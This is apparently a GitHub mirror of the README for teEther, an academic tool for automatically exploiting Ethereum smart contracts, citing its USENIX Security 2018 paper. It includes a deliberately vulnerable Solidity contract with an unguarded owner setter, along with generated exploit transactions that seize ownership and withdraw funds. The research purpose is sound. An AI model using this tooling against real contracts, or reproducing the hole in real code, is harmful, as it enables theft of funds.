Giters

imsellbaox / teether

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

teEther - Analysis and automatic exploitation framework for Ethereum smart contracts

teEther is an analysis tool for Ethereum smart contracts. It can

Quickstart

  1. Install teEther
python setup.py install
  1. Write your vulnerable smart contract
pragma solidity ^0.4.0;

contract Test{

    struct Transaction{
        address to;
        uint amount;
    }

    mapping (bytes32 => Transaction) transactions;

    address owner;
    
    function set_owner(address new_owner){
        owner = new_owner;
    }
    
    function new_transaction(address to, uint amount) returns (bytes32){
        bytes32 token = sha3(to, amount);
        Transaction storage t = transactions[token];
        t.to = to;
        t.amount += amount;
        return token;
    }
    
    function approve(bytes32 token){
        require(owner == msg.sender);
        Transaction storage t = transactions[token];
        t.to.transfer(t.amount);
        delete transactions[token];
    }
    
}
  1. Compile your contract
$ solc --bin test.sol | tail -n1 > test.code
  1. Extract the deployed contract code
$ python bin/extract_contract_code.py test.code > test.contract.code
  1. Generate an exploit
$ python bin/gen_exploit.py test.contract.code 0x1234 0x1000 +1000

...
eth.sendTransaction({from:"0x0000000000000000000000000000000000001234", data:"0x7cb97b2b0000000000000000000000000000000000000000000000000000000000001234", to:"0x4000000000000000000000000000000000000000", gasPrice:0})
eth.sendTransaction({from:"0x0000000000000000000000000000000000001234", data:"0x0129ab2700000000000000000000000000000000000000000000000000000000000012340000000000000000000000000000000000000000000000016bc75e2d63100103", to:"0x4000000000000000000000000000000000000000", gasPrice:0})
eth.sendTransaction({from:"0x0000000000000000000000000000000000001234", data:"0xa53a1adfce9e2ef9fe2568f35b22f98bb749862a13e0abd291c6ba4967016d629412829d", to:"0x4000000000000000000000000000000000000000", gasPrice:0})

Academia

Our paper teEther: Gnawing at Ethereum to Automatically Exploit Smart Contracts was published at the 27th USENIX Security Symposium (Usenix Security 18) (slides, video).

@inproceedings{teEther2018,
          author = {Johannes Krupp and Christian Rossow},
       publisher = {USENIX Association},
       booktitle = {27th USENIX Security Symposium (USENIX Security 18)},
            year = {2018},
           title = {{teEther: Gnawing at Ethereum to Automatically Exploit Smart Contracts}},
             url = {https://publications.cispa.saarland/2612/},
}

About

License:Apache License 2.0

Languages

Language:Python 91.6%Language:Solidity 8.4%